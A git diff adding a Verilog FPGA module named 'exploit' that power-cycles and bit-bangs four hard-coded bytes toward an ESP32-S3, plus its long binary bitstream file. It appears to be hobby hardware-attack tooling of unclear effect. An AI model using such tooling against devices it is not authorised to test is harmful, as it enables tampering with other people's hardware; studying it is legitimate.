diff --git a/ESP32-S3_Exploit/ES32-S3_Exploit.v b/ES32-S3_Exploit_UART.v similarity index 100% rename from ESP32-S3_Exploit/ES32-S3_Exploit.v rename to ES32-S3_Exploit_UART.v diff --git a/ESP32-S3_Exploit/.core b/ESP32-S3_Exploit/ESP32-S3_Exploit_BitBang/.core similarity index 100% rename from ESP32-S3_Exploit/.core rename to ESP32-S3_Exploit/ESP32-S3_Exploit_BitBang/.core diff --git a/ESP32-S3_Exploit/ESP32-S3_Exploit_BitBang/ES32-S3_Exploit_BitBang.v b/ESP32-S3_Exploit/ESP32-S3_Exploit_BitBang/ES32-S3_Exploit_BitBang.v new file mode 100644 index 0000000..e810a92 --- /dev/null +++ b/ESP32-S3_Exploit/ESP32-S3_Exploit_BitBang/ES32-S3_Exploit_BitBang.v @@ -0,0 +1,73 @@ +module exploit +( + // exploit + input clk_in, + output bang_tx, + output power_tx, + output [5:0] led +); + +////////// EXPLOIT +localparam INSTRUCTION_OFFSET = 100; + +// da official exploit code +localparam EXPLOIT_BYTES = {16'hFA,16'hEB,16'h11,16'hDD}; + +localparam EXPLOIT_BYTES_LEN = $bits(EXPLOIT_BYTES)-1; // $bits() seems to work // https://www.linkedin.com/pulse/bits-clog2-size-uses-differences-muhammed-kawser-ahmed + +localparam LEDS_ON = 0; +localparam LEDS_OFF = 6'b111111; + +reg [1:0] bang_tx_reg = 0; +reg [1:0] power_tx_reg = 1; +reg [1:0] led_run = 1; +reg [1:0] rst = 0; +reg [1:0] running = 1; +reg [5:0] ledCounter = 0; +reg [23:0] instruction_counter = 0; +reg [23:0] exploit_tx_count = 0; +reg [EXPLOIT_BYTES_LEN:0] exploit_bytes_reg = EXPLOIT_BYTES; + +always @(posedge clk_in) begin + if(rst == 1) begin + running = 1; + power_tx_reg = 1; + rst = 0; + end + + if(instruction_counter == INSTRUCTION_OFFSET) begin + power_tx_reg = 0; + rst = 1; + end + + if(running == 1) begin + if(instruction_counter >= INSTRUCTION_OFFSET && instruction_counter <= INSTRUCTION_OFFSET+EXPLOIT_BYTES_LEN) begin + bang_tx_reg <= exploit_bytes_reg[exploit_tx_count]; + exploit_tx_count <= exploit_tx_count + 1; + led_run <= 1; + end else begin + led_run <= 0; + end + + if(led_run == 1) begin + ledCounter <= ledCounter + 1; + if(ledCounter == LEDS_OFF) begin + ledCounter <= LEDS_ON; + end + end + + if(instruction_counter == INSTRUCTION_OFFSET+EXPLOIT_BYTES_LEN) begin + ledCounter <= LEDS_ON; + rst = 1; + running = 0; + end + + instruction_counter <= instruction_counter + 1; + end +end + +assign led = ledCounter; +assign bang_tx = bang_tx_reg; +assign power_tx = power_tx_reg; + +endmodule \ No newline at end of file diff --git a/ESP32-S3_Exploit/ESP32-S3_Exploit_BitBang/ESP32-S3_Exploit_BitBang.fs b/ESP32-S3_Exploit/ESP32-S3_Exploit_BitBang/ESP32-S3_Exploit_BitBang.fs new file mode 100644 index 0000000..e138987 --- /dev/null +++ b/ESP32-S3_Exploit/ESP32-S3_Exploit_BitBang/ESP32-S3_Exploit_BitBang.fs @@ -0,0 +1,728 @@ +1111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111 +1111111111111111 +1010010111000011 +0000011000000000000000000000000000010001000000000100100000011011 +0001000000000000000000000000000000000000000000000000000000000000 +0101000100000000111111111111111111111111111111111111111111111111 +00001011000000000000000000000000 +1101001000000000111111111111111100000000111111111111000000000000 +00010010000000000000000000000000 +00111011100000000000001011001000 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000011000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000110001110001011111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000110011101110001111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000111100001100010111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100100100011100100010100101000111111111111111111111111111111111111111111111111 +111100001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001111000110001000111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001011101010100000111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001011101010100000111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000110010011011111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000110010011011111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001011101010100000111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001011101010100000111111111111111111111111111111111111111111111111 +111100000100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000011001100110010111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010010000000000000000000000000000000000001111100011011011111111111111111111111111111111111111111111111111 +1111000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000